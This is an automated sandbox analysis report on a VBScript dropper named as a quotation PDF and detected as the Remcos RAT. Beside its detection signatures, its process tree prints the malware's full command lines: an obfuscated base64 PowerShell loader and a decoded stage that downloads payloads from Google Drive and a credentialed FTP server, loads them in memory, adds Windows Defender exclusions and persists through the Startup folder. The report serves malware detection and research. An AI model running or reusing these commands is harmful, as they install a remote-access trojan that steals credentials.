Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation request YN2024-10-07pdf.vbs

Overview

General Information

Sample name:Quotation request YN2024-10-07pdf.vbs
Analysis ID:1527623
MD5:3d8cf5dfe51b68c3ad7e205faf69eee2
SHA1:036713fc8f92ad3108fdd7851f7c0658c615f091
SHA256:a8d4c91b369fdea22a07354ee6da98dca280e3978faf60943fbadf837ffdc53a
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Copy file to startup via Powershell
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5720 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAIAA9ACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ACkAJw' + [char]66 + 'AAEAAcA' + [char]66 + 'KADgANwA1ADEAMg' + [char]66 + 'vAHIAcA' + [char]66 + 'yAGUAcA' + [char]66 + 'vAGwAZQ' + [char]66 + '2AGUAZAAnACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOw' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFQAcg' + [char]66 + 'IAFYAdQAkACgAIAA9ACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAIAAsAEIASw' + [char]66 + 'MAFIAVQAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'oAHYAbA' + [char]66 + 'nAHgAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AaA' + [char]66 + '2AGwAZw' + [char]66 + '4ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAaA' + [char]66 + '2AGwAZw' + [char]66 + '4ACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAAoACAAPQAgAEkAbw' + [char]66 + 'xAGEARgAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAEkAbw' + [char]66 + 'xAGEARgAkACgAIAA9ACAASQ' + [char]66 + 'vAHEAYQ' + [char]66 + 'GACQAewAgACkAIA' + [char]66 + 'yAG0ARQ' + [char]66 + '3AGoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAHIAbQ' + [char]66 + 'FAHcAagAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'UAHIASA' + [char]66 + 'WAHUAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAewAgACkAIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgADsA';$trrnd = $qKKzc; ;$trrnd = $qKKzc.replace('???' , 'B') ;;$mmqkg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $trrnd ) ); $mmqkg = $mmqkg[-1..-$mmqkg.Length] -join '';$mmqkg = $mmqkg.replace('%XRqhI%','C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs');powershell $mmqkg MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 1644 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7312 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 6536 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5560 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7176 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7548 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • AddInProcess32.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
          • AddInProcess32.exe (PID: 7784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 7432 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\wdxzjlwrwtnnhxspscqffyidgpjfmkcr" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 2460 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ggckk" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 6720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\iaqclvrm" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • wscript.exe (PID: 7300 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7556 cmdline: cmd.exe /c del "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 7860 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7912 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 8056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • AddInProcess32.exe (PID: 8064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 8108 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
